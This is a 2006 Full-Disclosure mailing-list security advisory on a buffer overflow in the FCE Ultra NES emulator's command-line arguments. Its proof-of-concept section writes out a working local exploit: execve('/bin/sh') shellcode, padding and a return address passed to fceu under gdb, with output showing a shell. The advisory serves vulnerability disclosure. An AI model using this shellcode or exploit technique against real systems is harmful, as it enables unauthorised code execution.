[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] FCE Ultra buffer overflow, yet another local exploit without any fancy stuff.
- To: xcas@xxxxxxx, vuln@xxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxxxx
- Subject: [Full-disclosure] FCE Ultra buffer overflow, yet another local exploit without any fancy stuff.
- From: "KaiJern, Lau" <xwings@xxxxxxxxxx>
- Date: Tue, 8 Aug 2006 22:42:38 +0800
=== FILE START ===
[xwings.net / security.net.my] Security Advisory :
FCE Ultra buffer overflow,
yet another local exploit without any fancy stuff.
[xwings.net / security.net.my] Security Advisory 07 August 2006
BACKGROUND:
===========
FCE Ultra is a NES (Nintendo Entertainment System) and Famicom (Family
Computer) emulator
for a variety of different platforms, based on Bero's FCE. Game compatibility
is very high,
provided you provide non-corrupt ROM/disk images.
It has been tested (and runs) under DOS, Linux SVGAlib, Linux X, Mac OS X, and
MS Windows.
A native GUI is provided for the MS Windows port, and the other ports use a
command-line
based interface. However, GNOME users can optionally use the GNOME front-end.
The SDL port should run on any modern UNIX-like operating system(such as
FreeBSD) with no code changes.
SOFTWARE:
=========
FCE Ultra (fceu) <= 0.98.13
http://fceultra.sourceforge.net/
TESTED:
=======
FreeBSD 6.1
Kubuntu 6.06
CRITICAL:
=========
Very Low
IMPACT:
=======
DoS
WHERE:
======
From Local
DESCRIPTION:
============
Well .....
xwings@montana:[~]$ fceu
Starting FCE Ultra 0.98.13...
Usage is as follows:
fceu <options> filename
Almost all the argv are exploitable.
POC:
====
xwings@montana:[~]$ gdb -q fceu
(no debugging symbols found)...(gdb)
(gdb) r -fs `ruby -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
\
\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";print "E" *
2029;print "\x28\xe4\xbf\xbf"'`
Starting program: /usr/X11R6/bin/fceu -fs
`ruby -e 'print "\x31\xc0\x50\x68\x2f \
\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; \
print "E" * 2029;print "\x28\xe4\xbf\xbf"'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...warning:
Unable to get location for thread creation breakpoint: generic error [New LWP
100164]
(no debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)
...(no debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)
...(no debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)
...(no debugging symbols found)...
Starting FCE Ultra 0.98.13...
[New Thread 0x820c000 (LWP 100164)]
(no debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)...
(no debugging symbols found)...Loading 1?h//shh/bin??TSP??EEE
.. (CUT) ..
.. (CUT) ..
.. (CUT) ..
EEE(�..
$ uname -a
FreeBSD montana.xwings.net 6.1-STABLE FreeBSD 6.1-STABLE #8: Mon Jul 31
14:14:12 MYT 2006
DETECTION:
==========
[xwings.net / security.net.my] has confirmed this vulnerability on FCE Ultra
0.98.1 and below.
All previous versions are suspected vulnerable to this issue.
VI. VENDOR RESPONSE
nothing at the moment
VIII. DISCLOSURE TIMELINE
7th August 2006, Initial vendor notification
IX. CREDIT
Bug Founder : KaiJern, Lau
Email : xwings <at> xwings <dot> net
Thanks to all the folks @ pulltheplug.org.
== EOF ===
--
--
Regards,
KaiJern, Lau
==
All good things ...
come by grace, and grace come by art, and art does not come easy.
** From : xwings @ xwings . net
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/